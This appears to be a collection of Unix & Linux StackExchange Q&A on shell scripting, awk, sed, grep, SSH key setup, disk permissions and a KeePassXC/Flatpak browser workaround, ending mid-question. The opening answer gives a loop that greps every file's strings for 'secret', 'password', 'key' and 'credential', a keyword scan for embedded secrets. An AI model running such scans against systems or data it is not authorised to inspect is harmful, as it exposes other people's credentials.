You're using egrep which is the same as grep -E, i.e. it enables the use of extended regular expressions. In an extended regular expression, | is an alternation (which is what you want to use), and \| matches a literal | character. You therefore want

grep -w -i -E 'secret|password|key|credential|http'

or

grep -i -E '\<(secret|password|key|credential|http)\>'

where \< and \> match word boundaries. Or

grep -w -i -F \
    -e secret \
    -e password \
    -e key \
    -e credential \
    -e http

... if you want to do string comparisons rather than regular expression matches. Additionally, you will want to always double quote variable expansions. This would allow you to also process files with names that contain whitespace characters (space, tab, newline) and names that contain filename globbing characters (*, ?, [...]) correctly:

#!/bin/sh
for name in ./*; do
    [ ! -f "$name" ] && continue  # skip non-regular files
    printf '==== %s ====\n' "$name"
    strings "$name" | grep ...
done

See also: Why does my shell script choke on whitespace or other special characters? When is double-quoting necessary?
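Putting it together, the loop from the question with the corrected pattern and quoting might look like this:

#!/bin/bash
echo "Searching files in directory for secrets and urls"
for file in ./*; do
    [ -f "$file" ] || continue      # skip directories and other non-regular files
    echo "=====$file====="
    strings "$file" | grep -w -i -E 'secret|password|key|credential|http'
done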
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583928", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/187351/" ] }
583,983
I have the following folder structure:

alpha
  src
    doit.py
beta
  src
    doit.py
gama
  src
    doit.py

and the command python ../../doit.py --clean --add_source inner

I want to create an alias, doit, that executes the corresponding file depending on which parent folder I'm located in. For example: If I'm inside alpha or one of its sub-directories, when I use:

doit --addsource extra

to actually run:

python /home/alpha/src/doit.py --clean --addsource extra

If I'm inside beta or one of its sub-directories, when I use:

doit --addsource inner

to actually run:

python /home/beta/src/doit.py --clean --addsource inner
You would be better served by a shell function:

doit () {
    local dir
    case $PWD/ in
        /home/alpha/*) dir=alpha ;;
        /home/beta/*)  dir=beta  ;;
        /home/gamma/*) dir=gamma ;;
        *) echo 'Not standing in the correct directory' >&2
           return 1
    esac
    python "/home/$dir/src/doit.py" --clean "$@"
}

This would set the variable dir to the string alpha, beta or gamma depending on the current working directory, or complain that you're in the wrong directory tree if the current directory is elsewhere. It then runs the Python script, utilizing the $dir value, with the --clean option and adds whatever other arguments that you've passed to the function. You would add this shell function's definition to wherever you ordinarily add aliases.
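If more trees get added later, a variant that walks up from the current directory until it finds a src/doit.py avoids hard-coding the names. A sketch, assuming the layout shown in the question:

doit () {
    local dir=$PWD
    while [ "$dir" != / ]; do
        if [ -f "$dir/src/doit.py" ]; then
            python "$dir/src/doit.py" --clean "$@"
            return
        fi
        dir=$(dirname "$dir")   # step up one level
    done
    echo 'no src/doit.py found above the current directory' >&2
    return 1
}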
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583983", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/314716/" ] }
584,056
I have a file like the one below in a Linux folder. There should be 4 columns in the file with comma-separated values, but in some lines there are only 3 columns. I want to add a blank at the beginning of the line when there are 3 columns.

Input:

col1,col2,col3,col4
a1,a2,a3,a4
b1,b2,b3,b4
c2,c3,c4
d1,d2,d3,d4

Output:

col1,col2,col3,col4
a1,a2,a3,a4
b1,b2,b3,b4
,c2,c3,c4
d1,d2,d3,d4

Thanks in advance
You could use awk ex. awk -F, 'NF==3 {$0=","$0} 1' file If you have a suitably recent version of GNU awk you can apply it to the file in-place using gawk -i inplace -F, 'NF==3 {$0=","$0} 1' file Otherwise, it's probably easier to use a different tool such as sed or perl . perl -i -F, -pe '$_ = "," . $_ if $#F == 2' file or perhaps sed -i'.bak' -e 's/,/,/3;t' -e 's/^/,/' file (attempt to replace the 3rd comma, and substitute a comma at the start of line if it fails).
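A quick way to sanity-check the awk version before touching the real file:

$ printf '%s\n' 'col1,col2,col3,col4' 'a1,a2,a3,a4' 'c2,c3,c4' | awk -F, 'NF==3 {$0=","$0} 1'
col1,col2,col3,col4
a1,a2,a3,a4
,c2,c3,c4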
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584056", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408082/" ] }
584,077
Is there any way to add application shortcuts to the default panel in Debian 10 XFCE environment? If not, are there any alternate options to achieve this? Thanks
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584077", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410191/" ] }
584,081
telnet test | grep -o Unable
telnet: Unable to connect to remote host: Connection refused

Only 'Unable' should be the result.
The error message output by telnet when it's not able to connect is printed to the standard error stream. The standard error stream is by default sent straight to the terminal. You may only pipe the standard output stream to some other command (grep in this case). You may send the error stream to the standard output stream by means of a redirection:

telnet test 2>&1 | grep -o Unable

This would merge the two streams and grep would act on the merged data stream. If you want to catch an error condition in telnet, it would also be possible to use the utility's exit status:

if ! telnet test 2>/dev/null; then
    echo 'something went wrong with telnet'
    exit 1
fi

echo 'telnet ran successfully'

This would exit the script if telnet returned a non-zero exit status (signalling some sort of failure). I've additionally redirected the error stream to /dev/null to discard it completely.
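If the goal is really just a reachability test, netcat may be a better fit than telnet since it is built for scripting. A sketch, assuming the OpenBSD netcat (whose -z does a connect-only probe) and port 23, telnet's default:

if nc -z -w 5 test 23 2>/dev/null; then
    echo 'port open'
else
    echo 'Unable to connect'
fi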
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584081", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410194/" ] }
584,118
I need to create an image of a partition of a usb drive: dd if=/dev/sdb1 of=sdb1.img Is there a way to do it without sudo/su? Maybe by changing permissions on the usb drive? What would be the security implications?
Is there a way to do it without sudo/su? Maybe by changing permissions on the usb drive?

If your /dev/sdb1 has permissions like:

$ ls -l /dev/sdb1
brw-rw---- 1 root disk 8, 17 Apr 25 17:07 /dev/sdb1

Then an option would be to add your user to the disk group:

# usermod --append --groups disk username

After that, the next time that the user logs in, they'll be able to read the device. Your dd should work after that.

What would be the security implications?

Since the user can read any disk directly, the user would have access to files owned by any user on any disk. The user would be able to not only read any disk, but would also be able to write directly to any block device file with the same permissions (g+rw). That user could easily corrupt any filesystem by accidentally writing to those block device files. Changing permissions to disallow the disk group write permissions might have other side effects that I can't predict. As a result, if you're on a multi-user system or on a system where you care about data stored on any disk, I don't recommend you do this.
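If group-wide access to every disk is broader than you want, a narrower alternative is a udev rule that hands just this one device to your user. A sketch, where the vendor and model IDs are placeholders to be read from udevadm info /dev/sdb:

# /etc/udev/rules.d/99-usb-image.rules
SUBSYSTEM=="block", ENV{ID_VENDOR_ID}=="abcd", ENV{ID_MODEL_ID}=="1234", OWNER="username"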
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584118", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410219/" ] }
584,215
I am writing a simple helper function to show the sizes of files. This is the code I have so far:

find . -type f -size +10M -printf "%f -> %s B\n"

The output I get is:

clay-banks--Ni2fpLUgRI-unsplash.jpg -> 181794593 B
jake-nackos-_kdX2vPc33U-unsplash.jpg -> 448148323 B
73-738467_nature-wallpapers-high-quality-images-hd-desktop-images.jpg -> 131115725 B

However, I want to show the file sizes in MB. How should I modify this so it works like below:

clay-banks--Ni2fpLUgRI-unsplash.jpg -> 173 MB
jake-nackos-_kdX2vPc33U-unsplash.jpg -> 427 MB
73-738467_nature-wallpapers-high-quality-images-hd-desktop-images.jpg -> 125 MB
At least on GNU-based systems, you should be able to use stat and numfmt to get the desired format, e.g.:

find . -type f -size +10M -printf "%f -> " -exec sh -c '
    stat -c "%s" "$1" | numfmt --to-unit=1048576 --format="%.0f MB"' sh {} \;

Keep --to-unit=1048576 for binary (MiB-sized) units, which is what your expected output uses, or change it to --to-unit=1000000 for decimal megabytes.
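If you'd rather avoid spawning a shell per file, a single awk pass over find's output also works. A sketch: it splits each record on the first space, so spaces in filenames survive, though embedded newlines would still break it:

find . -type f -size +10M -printf '%s %f\n' |
  awk '{ printf "%s -> %.0f MB\n", substr($0, index($0, " ") + 1), $1 / 1048576 }'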
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584215", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410332/" ] }
584,421
Given a single column file of numbers, call it f , the following Awk code will return the maximum value cat f | awk ' BEGIN {max = -inf} {if ($1>max) max=$1} END { print max } ' The same approach to get the minimum doesn't produce anything cat f | awk ' BEGIN {min = inf} {if ($1<min) min=$1} END {print min} ' But if instead of using inf , I start off with min = [some large number] , if the number is large enough, depending upon what's in the file, then the revised code works. Why doesn't inf work, and is there some way to make the min case work like the max case, without having to know what's in the file?
The actual task is best solved by initializing your max/min values not by an imaginary "smallest" or "greatest" number (which may not be implemented in the framework you are using, in this case awk ), but by initializing it using actual data. That way, it is always guaranteed to provide a meaningful result. In your case, you can use the very first value you encounter (i.e. the entry in the first line) to initialize max and min , respectively, by adding a rule NR==1{min=$1} to your awk script. Then, if the first value is already the minimum, the subsequent test will not overwrite it, and in the end the correct result will be produced. The same holds for searches of the maximum value, so in combined searches, you can state NR==1{max=min=$1} As for the reason why your approach with inf didn't work with awk whereas -inf seemed to, @steeldriver has provided a good explanation in a comment to your question, which I will also summarize for the sake of completeness: In awk , variables are "dynamically typed", i.e. everything can be a string or a number depending on use (but awk will "remember" what it was last used as and keep that information along for use in the next operation). Whenever arithmetic operations involving a variable are found in the code, awk will try to interpret the content of that variable as a number and perform the operation, from where on the variable is typed as numerical if successful. The default value for any variable that has not yet been assigned anything is the empty string, which is interpreted as 0 in arithmetic operations. The variable name(*) inf has no special meaning in awk , hence when used just so, it is an empty variable that will evaluate to 0 in an arithmetic expression such as -inf . Therefore, the "maximum search" with the max variable initialized to -inf works if your data is all positive, because -inf is simply 0 (and as such, the smallest non-negative number). In the "minimum search" problem, however, initializing min to inf will initialize the variable to the empty string, as no arithmetic operation is present that would warrant an automatic conversion of that empty string to a number. Therefore, in the later comparisons if ($1<min) min=$1 the input, $1 , is compared with a string value, which is why awk treats $1 as a string, too, and performs a lexicographical comparison rather than a numerical one. However, lexicographically, nothing is "smaller" than the empty string, and so min never gets assigned a new value. Therefore, in the END section, the statement print min prints the (still) empty string. (*) see Stephen Kitt's answer on how a string with content "inf" can actually have a meaning in awk .
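Putting the data-initialized approach together, here is a sketch that reports both extremes in one pass; the +0 forces a numeric interpretation even when a value would otherwise be treated as a string:

awk 'NR == 1 { max = min = $1 + 0 }
     { if ($1 + 0 > max) max = $1 + 0; if ($1 + 0 < min) min = $1 + 0 }
     END { if (NR) print "min=" min, "max=" max }' f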
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/584421", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/366321/" ] }
584,423
for a in {P02183606,P02183608,sassa}
do
    for b in {PID,PID2,sas}
    do
        echo "http://indiafirstlife.com//onlineInsurance-rest/uploadDocument/uploadDocumentsOmniMannualPush?applicationRefNo=$a&applicationFormId=$b"
    done
done

Expected output:

http://indiafirstlife.com//onlineInsurance-rest/uploadDocument/uploadDocumentsOmniMannualPush?applicationRefNo=P02183606&applicationFormId=PID
http://indiafirstlife.com//onlineInsurance-rest/uploadDocument/uploadDocumentsOmniMannualPush?applicationRefNo=P02183608&applicationFormId=PID2
http://indiafirstlife.com//onlineInsurance-rest/uploadDocument/uploadDocumentsOmniMannualPush?applicationRefNo=sassa&applicationFormId=sas
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/584423", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410508/" ] }
584,521
If KeePassXC is sandboxed in a Flatpak , browsers can only access it, if they are not sandboxed, i.e. installed as an deb/rpm package or similar on the host.Sandboxing both the browser, i.e. Firefox , and KeePassXC – or at least the browser and installing KeePassXC natively, which you'd actually want for security reasons – is not possible. TL;DR: this should work out-of-the box: Firefox (host-installed), KeePassXC (flatpak from flathub) this does not: Firefox (sandboxed), KeePassXC (host or sandboxed, does not matter) So how to make that communication work?
Background

If you just want the solution, you can skip this part. But for the curious, I'll explain the problems we face: KeePassXC creates a UNIX socket in $XDG_RUNTIME_DIR/kpxc_server for applications to listen to. keepassxc-proxy is started – via native messaging – by the browser (triggered by the add-on [email protected], i.e. KeePassXC-Browser) and tries to listen on that socket to find messages.

If Firefox is not sandboxed, that proxy can start as usual. The only thing it possibly needs to do is get into the KeePassXC flatpak. Flathub KeePassXC has a patch that allows the keepassxc-proxy to be started via flatpak run, i.e. Firefox can start it that way. That is, so far, why Firefox installed on the host does work…

Now why it does not work if Firefox is installed as a flatpak: The very good official Firefox flatpak by Mozilla really does have few permissions for being a browser. E.g. it does not have any generic access to the file system (it uses portals). Anyway, whatever it does, it cannot do one thing: spawn a process on the host or in another flatpak. So we could solve that by making wrapper scripts and using flatpak-spawn to let Firefox escape its sandbox. However, seeing how lovely and quite securely the Firefox sandbox is already built, I would not dare to destroy that security for such a feature. After all, from a security POV you could then also just install Firefox on the host, yet again. So glad news ahead: This solution preserves all sandboxes and security aspects!

However, even if we've solved the fact of Firefox having to run the proxy, there are more problems. In short, these are the main points we need to solve:

Starting keepassxc-proxy by Firefox (solution: we run it inside the Firefox sandbox)
Allowing Firefox to access the socket of KeePassXC. Note: At that step, you can already run the variation: Firefox (sandboxed), KeePassXC (host-installed)
Exposing the UNIX socket from the KeePassXC flatpak to other applications outside of the flatpak (solution: a symbolic link)

Current workaround v1.2

Tested with: Fedora 32, org.mozilla.firefox v75 from flathub, org.keepassxc.KeePassXC v2.5.4 from flathub

Starting keepassxc-proxy by Firefox

Worst things first: We need the keepassxc-proxy as a binary, because we want to have it run inside of the Firefox flatpak. Good for us: it has not many dependencies and is available as a stand-alone application. So I chose the Rust proxy application (because why should not I?). If you trust me, you can get my compiled binary below; just skip two steps ahead.

Clone the git repo and compile it (run cargo build --release). You find the result in ./target/release. The keepassxc-proxy binary, version 211ae91, compiled with rustc 1.43.0 (the current stable in Fedora 32) for x86_64 (and, if it helps and you wanna know more, there's .rustc_info.json). And although Rust is not (yet) totally reproducible when compiling, I did get the same bit-by-bit result on two machines with Fedora 32. The SHA-256 hash is c5c4c6c011a4d64f7e4dd6c444dcc70bee74d23ffb28c9b65f7ff6d89a8f86ea. So if you are in a risky mood, you can just download my keepassxc-proxy binary here. (hosted by GitHub ;P)

Now we need to tell Firefox about the new binary. Go to ~/.var/app/org.mozilla.firefox/.mozilla/native-messaging-hosts. Actually, the native-messaging-hosts dir likely does not exist yet, so do create it.
Create a file org.keepassxc.keepassxc_browser.json in there, and paste in the following content:

{
    "allowed_extensions": [
        "[email protected]"
    ],
    "description": "KeePassXC integration with native messaging support, workaround for flatpaked Firefox, see https://is.gd/flatpakFirefoxKPXC",
    "name": "org.keepassxc.keepassxc_browser",
    "path": "/home/REPLACE_WITH_USERNAME/.var/app/org.mozilla.firefox/.mozilla/native-messaging-hosts/keepassxc-proxy",
    "type": "stdio"
}

Note that only absolute paths work (I guess), so replace REPLACE_WITH_USERNAME with your $USER name, so that the path leads to its own working dir. You see what I am doing: We now place the downloaded/compiled keepassxc-proxy in the same dir. Obviously, you could use any other path there, but this was the first one that is obviously accessible by Firefox and you have everything in one place. (If you have better suggestions, feel free to let me know.) Note: Remember to make it executable (chmod +x) if it is not already.

Allowing Firefox to access the socket

KeePassXC, by default, creates its socket in $XDG_RUNTIME_DIR/kpxc_server. So this is what we need to give the Firefox flatpak access to (read-only is obviously enough). Fortunately, this is easy. Just run:

$ sudo flatpak override --filesystem=xdg-run/kpxc_server:ro org.mozilla.firefox

Hooray!: For those who install KeePassXC on the host (without any sandbox/flatpak), this is enough. Start KeePassXC and then Firefox and it should be able to connect. :tada: Please note the "existing problems" section at the bottom, though. Continue if you also want to run KeePassXC in a flatpak.

Exposing the UNIX socket from the KeePassXC flatpak

Note: Again, skip to the bullet point (point 1) below if you don't wanna know the technical background.

The flatpaked KeePassXC from Flathub creates its Unix socket in the location flatpaks should do so, in $XDG_RUNTIME_DIR/app/org.keepassxc.KeePassXC/kpxc_server. (If it would use $XDG_RUNTIME_DIR directly like the "native" KeePassXC, it would only exist in the sandbox.) As we know, the usual keepassxc-proxy expects the file at $XDG_RUNTIME_DIR/kpxc_server. To solve this, we just create a symbolic link. As you can verify, this actually solves our problem. For some very strange reason, the Flatpak sandbox now allows Firefox (and all other flatpaks! Just FYI, be aware of that.) to see that UNIX socket file. As it should turn out later, this does not work when you move that symbolic link anywhere else (even another file name already prevents it from working – I've tried a lot of things). However, $XDG_RUNTIME_DIR is usually deleted at shutdown, so we need to recreate it at startup/user login. Good for us, there is already a tool for that. (You could of course also fiddle with shell scripts in your autostart, but that is ugly.) That's why we make use of systemd-tmpfiles. (The man page for tmpfiles.d is more useful for us, actually.)

Go to ~/.local/share/user-tmpfiles.d. Again, there is a high chance the user-tmpfiles.d dir does not exist yet. If so… well… you know what to do…

Now download and place the following config file in there: kpxc_server.conf. This is basically a config file for systemd-tmpfiles that tells it to create that symbolic link for the user.

Reboot, so systemd-tmpfiles can apply the changes and create the symbolic link. (Alternatively, you can also manually run systemd-tmpfiles --user --create to apply the changes.)

Hooray!: Afterwards start the KeePassXC flatpak and then Firefox and it should be able to connect.
:tada: Please note the "existing problems" section below.

Existing problems

Firefox, for some reason, cannot see the $XDG_RUNTIME_DIR/kpxc_server file if the file (respectively its symbolic link target) does not exist yet. In practice, this results in one big disadvantage: You always need to start KeePassXC before Firefox.

For some more strange reason, if you have this workaround set up, the usual way that you run a non-flatpaked native Firefox and connect it by spawning the proxy inside the flatpak (like flatpak run org.keepassxc.KeePassXC) may not work. Delete the symbolic link again to make this work.

Debugging tips

In Firefox use about:debugging to access add-on internals. [email protected] is the add-on ID. It actually also logs failed attempts. Note there are different results (in the logs and visibly) when it cannot start the proxy vs. when it can start the proxy but no connection succeeds (because the UNIX socket is not there, e.g.).

To manually get into the flatpak and "see" in a shell what it has access to/looks like, use something like flatpak run --command=/bin/sh org.mozilla.firefox.

To check whether the socket file is accessible (a symbolic link can point to a non-existent file), just cat it and you'll see a strange error that cat cannot find a resource.

Things I've tried

Things that do not work, preserved for future solutions and better™ workarounds:

All things in $XDG_RUNTIME_DIR/app are highly sandboxed; even with flatpak overrides I could not get the Firefox flatpak to read the content of the ../org.keepassxc.KeePassXC dir. Even with crazy symbolic links in its own dir. (Do try it though, maybe you'll make it! At least you'll learn something. :wink:.)

What works though is: You can override the KeePassXC flatpak to get access to Mozilla. Only write access is possible, though! Thus, if it would place the proxy there (again: symbolic links here don't work!), Firefox could also read it.

The symbolic link must be created by an application outside of the sandbox. Inside of it, it's – again – sandboxed and only visible inside of it.

Final notes

That took quite some time to figure out. I do try to continue improving this workaround and find solutions in this GitHub issue. It's best to follow there if you are interested. I've cross-posted this question and answer in the Fedora community and in the Flathub forum.
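For reference, the kpxc_server.conf downloaded above should boil down to a single symlink line of roughly this shape (this is an assumption about the linked file's content, written from the tmpfiles.d(5) syntax; %t expands to the user's runtime directory in per-user instances):

# ~/.local/share/user-tmpfiles.d/kpxc_server.conf
L %t/kpxc_server - - - - %t/app/org.keepassxc.KeePassXC/kpxc_server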
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/584521", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/146739/" ] }
584,528
My directory /var has reached 92% usage and I need to clean it. I am trying to identify where I should point at. I know that df -k gives me the % of allocation from /, but how can I get the same info inside /var? How do I drill down to find the directory or directories that are taking up the most space? I am trying df -k /var but it is not outputting the % allocation for all directories inside. I am using HP-UX. It is an old machine from work. It has no graphical UI as far as I know.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/584528", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410590/" ] }
584,686
I have some experience using bash, but this command, which I saw in a tutorial, caught me off guard:

cat ~/.ssh/id_rsa.pub | ssh git@remote-server "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"

I know what the command does. It takes the output of the file ~/.ssh/id_rsa.pub, then SSHes to a remote server, creates a new directory under the user home called .ssh, then creates a new file called authorized_keys and pours the contents of id_rsa.pub into that file. What I couldn't figure out is at which point the contents of the id_rsa.pub file get injected into the authorized keys file. So, I know the pipe (|) takes the output to its left and feeds it to the command on its right-hand side. But normally we use the cat command like this:

cat "content_to_be_added" >> file_to_be_appended

so, if I'm not mistaken, the contents of id_rsa.pub should appear right before >> in order for this to work. So, how does this function exactly, and why? By the way, please feel free to correct my terminology. I'd also appreciate it if you can tell me whether this operator (>>) has a specific name.
The command cat >> ~/.ssh/authorized_keys reads from standard input (since no filename was given to cat to read from) and appends to the named file. The >> redirection operator opens the target file for appending . Using > in place of >> would have truncated (emptied) the target file before writing the data. Where does the data on standard input of that remote cat command come from? The standard input stream is inherited by cat from the remote shell. The remote shell inherits the standard input stream from ssh . The standard input for ssh comes via the pipe from the local cat command, which reads the ~/.ssh/id_rsa.pub file. The local cat is not needed in your pipeline: ssh git@remote-server 'mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys' < ~/.ssh/id_rsa.pub Note, however, that if mkdir does actually create a directory, that directory needs to have the correct permissions for ssh to work properly: ssh git@remote-server 'mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat >> ~/.ssh/authorized_keys' < ~/.ssh/id_rsa.pub Or, you may just choose to fail to append the data: ssh git@remote-server 'cat >> ~/.ssh/authorized_keys' < ~/.ssh/id_rsa.pub
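Note that OpenSSH ships a helper, ssh-copy-id, that performs this same append (and creates the remote ~/.ssh with sane permissions) in one step:

ssh-copy-id -i ~/.ssh/id_rsa.pub git@remote-server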
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584686", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/150668/" ] }
584,919
I have a directory called outer . outer contains a directory named inner (which contains lots of files of same extension) I cd to outer . How can I delete all the files within inner but leave the directory inner remaining (but empty)?
If you want to delete a directory's contents and not the directory itself, all you need to do is tell rm to delete the contents:

rm inner/*

That will delete all non-hidden files in ./inner and leave the directory intact. To also delete any subdirectories, use -r:

rm -r inner/*

If you also want to delete hidden files, you can do (assuming you are using bash):

shopt -s dotglob
rm -r inner/*

That last command will delete all files and all directories in inner, but will leave inner itself intact. Finally, note that you don't need to cd to outer to run any of these:

$ tree -a outer/
outer/
├── dir
└── inner
    ├── dir
    ├── file
    └── .hidden

3 directories, 2 files

I can now run rm -r outer/inner/* from my current directory, no need to cd outer, and it will remove everything except the directory itself:

$ shopt -s dotglob
$ rm -r outer/inner/*
$ tree -a outer/
outer/
├── dir
└── inner

2 directories, 0 files
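With GNU find there is also a one-liner that empties the directory, hidden entries included, without needing dotglob; -mindepth 1 protects inner itself and -delete removes depth-first:

find inner -mindepth 1 -delete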
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584919", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/50597/" ] }
584,992
We have data as below:

ABC|RAM|BANGALORE|100,200,300

Can we run any pivot/loop to divide the above data into multiple records?

ABC|RAM|BANGALORE|100
ABC|RAM|BANGALORE|200
ABC|RAM|BANGALORE|300

As per the last column's multiple comma-delimited values, that number of records should be created. Is there any way we can do this in a Linux shell?
I wouldn't use the shell itself for this. Another awk implementation:

$ awk 'BEGIN{OFS=FS="|"} {split($NF,a,","); for(i in a) {$NF = a[i]; print}}' data
ABC|RAM|BANGALORE|100
ABC|RAM|BANGALORE|200
ABC|RAM|BANGALORE|300

or with Miller

$ mlr --nidx --fs '|' nest --explode --values --across-records --nested-fs ',' -f 4 data
ABC|RAM|BANGALORE|100
ABC|RAM|BANGALORE|200
ABC|RAM|BANGALORE|300

or more compactly

mlr --nidx --fs '|' nest --evar ',' -f 4 data

If you really need to use a shell, then with a suitably recent bash:

#!/bin/bash

while IFS='|' read -a fields; do
    IFS=',' read -a vals <<<"${fields[-1]}"
    unset 'fields[-1]'
    for v in "${vals[@]}"; do
        printf '%s|' "${fields[@]}"
        printf '%s\n' "$v"
    done
done < data
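One caveat on the first awk version: for (i in a) visits array elements in an unspecified order, so the exploded rows are not guaranteed to come out as 100, 200, 300. A variant that preserves the order:

awk 'BEGIN { OFS = FS = "|" }
     { n = split($NF, a, ",")
       for (i = 1; i <= n; i++) { $NF = a[i]; print } }' data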
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584992", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/353888/" ] }
585,007
I have a module manifest, let's say it is named as work.pp . I added a custom fact has_work in /lib/facter/work.rb . When I run puppet agent -t , and check facter -p has_work , the fact has appropriate value. However, in my work.pp file, I have a condition like this: if ($has_work) { $create_file = true } and then based on $create_file I have something like this: if ($create_file) { file { "create file": path => "/path/to/file.ini", alias => "/path/to/file.ini", ensure => file, owner => devops, mode => "0644", } However, despite of $has_work being true, no file is created on client. I'm trying to figure out why is it so.Any help is appreciated. Thanks!
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585007", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410999/" ] }
585,008
I rebooted my supermicro server and it failed to boot my linux disk. Within the BIOS/EFI I can navigate to the one operating system disk and see the EFI partition and of all the .efi files listed but there is no grubx64.efi . Which I believe is what you select, if you were to manually add your own boot option or if you were to manually boot from the EFI shell such as fs0:\EFI\EFI\redhat\grubx64.efi but I am missing this file. How does one fix this? This is on RHEL 7.6
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585008", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/154426/" ] }
585,013
I have the below data (actual output):

http://localhost:5058/uaa/token,80
https://t-mobile.com,443
http://USERSECURITYTOKEN/payments/security/jwttoken,80
https://core.op.api.internal.t-mobile.com/v1/oauth2/accesstoken?grant_type,443
http://AUTOPAYV3/payments/v3/autopay/search,80
http://AUTOPAYV3/payments/v3/autopay,80
http://CARDTYPEVALIDATION/payments/v4/internal/card-type-validation/getBinDetails,80

I am trying to get the below data (expected output):

localhost:5058/uaa/token,80
t-mobile.com,443
USERSECURITYTOKEN/payments/security/jwttoken,80
core.op.api.internal.t-mobile.com/v1/oauth2/accesstoken?grant_type,443
AUTOPAYV3/payments/v3/autopay/search,80
AUTOPAYV3/payments/v3/autopay,80
CARDTYPEVALIDATION/payments/v4/internal/card-type-validation/getBinDetails,80

and would like to combine the working command with the below script:

#!/bin/bash
for file in $(ls); do
    #echo " --$file -- ";
    grep -P '((?<=[^0-9.]|^)[1-9][0-9]{0,2}(\.([0-9]{0,3})){3}(?=[^0-9.]|$)|(http|ftp|https|ftps|sftp)://([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:/+#-]*[\w@?^=%&/+#-])?|\.port|\.host|contact-points|\.uri|\.endpoint)' $file|grep '^[^#]' |awk '{split($0,a,"#"); print a[1]}'|awk '{split($0,a,"="); print a[1],a[2]}'|sed 's/^\|#/,/g'|awk '/http:\/\// {print $2,80} /https:\/\// {print $2,443} /Points/ {print $2,"9042"} /host/ {h=$2} /port/ {print h,$2; h=""}'|awk -F'[, ]' '{for(i=1;i<NF;i++){print $i,$NF}}'|awk 'BEGIN{OFS=","} {$1=$1} 1'|sed '/^[0-9]*$/d'|awk -F, '$1 != $2'
done |awk '!a[$0]++'
#echo "Done."
stty echo
cd ..

Need the solution ASAP, thank you in advance
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585013", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/397847/" ] }
585,019
If I press zz in vim, my screen/view will center vertically on the cursor position. How can I do the same, but horizontally? Is there a vim command for that?
There's no single Vim command, but you can combine zs with zH: Scroll to position the cursor at the left side of the screen, then scroll half a screenwidth to the right. I have this mapping in my ~/.vimrc:

" Horizontally center cursor position.
" Does not move the cursor itself (except for 'sidescrolloff' at the window
" border).
nnoremap <silent> z. :<C-u>normal! zszH<CR>
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585019", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411015/" ] }
585,087
I have some millions of files that have been saved with a 'corrupted' name. The extension has been saved as _pdf. What I want is to recursively edit all those extensions to use a dot as expected.

find . -name '*_pdf' -type f -exec bash -c 'mv -- "$1" "${1//_/.}"' -- {} \;

I have already tried this bash script, but it replaces all '_' found with '.'; I want just the last _, and only if followed by common extensions (pdf, jpg, jpeg).
It's replacing all instances of _ because ${1//_/.} is global (${1/_/.} would be non-global, but replace the first match rather than the last). Instead you could use POSIX ${1%_*} and ${1##*_} to remove the shortest suffix and longest prefix, then rejoin them:

find . -name '*_pdf' -type f -exec sh -c 'mv "$1" "${1%_*}.${1##*_}"' sh {} \;

or

find . -name '*_pdf' -type f -exec sh -c 'for f do mv "$f" "${f%_*}.${f##*_}"; done' sh {} +

For multiple extensions:

find . \( -name '*_pdf' -o -name '*_jpg' -o -name '*_jpeg' \) -type f -exec sh -c '
    for f do mv "$f" "${f%_*}.${f##*_}"; done' sh {} +

I removed the -- end-of-options delimiter - it shouldn't be necessary here since find prefixes the names with ./. You may want to add a -i option to mv if there's a risk that both a file_pdf and file.pdf exist in a given directory and you want to be given a chance not to clobber the existing file.pdf.
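With millions of files at stake, it may be worth previewing the renames first by echoing the mv commands instead of running them:

find . \( -name '*_pdf' -o -name '*_jpg' -o -name '*_jpeg' \) -type f -exec sh -c '
    for f do echo mv "$f" "${f%_*}.${f##*_}"; done' sh {} +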
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/585087", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/298405/" ] }
585,107
After freshly installing the Debian buster OS and the package command-not-found, running a command gives:

$ curl
Could not find the database of available applications, run update-command-not-found as root to fix this
Sorry, command-not-found has crashed! Please file a bug report at:
http://www.debian.org/Bugs/Reporting
Please include the following information with the report:

command-not-found version: 0.3
Python version: 3.7.3 final 0
Distributor ID: Debian
Description: Debian GNU/Linux 10 (buster)
Release: 10
Codename: buster
Exception information:

local variable 'cnf' referenced before assignment
Traceback (most recent call last):
  File "/usr/share/command-not-found/CommandNotFound/util.py", line 23, in crash_guard
    callback()
  File "/usr/lib/command-not-found", line 93, in main
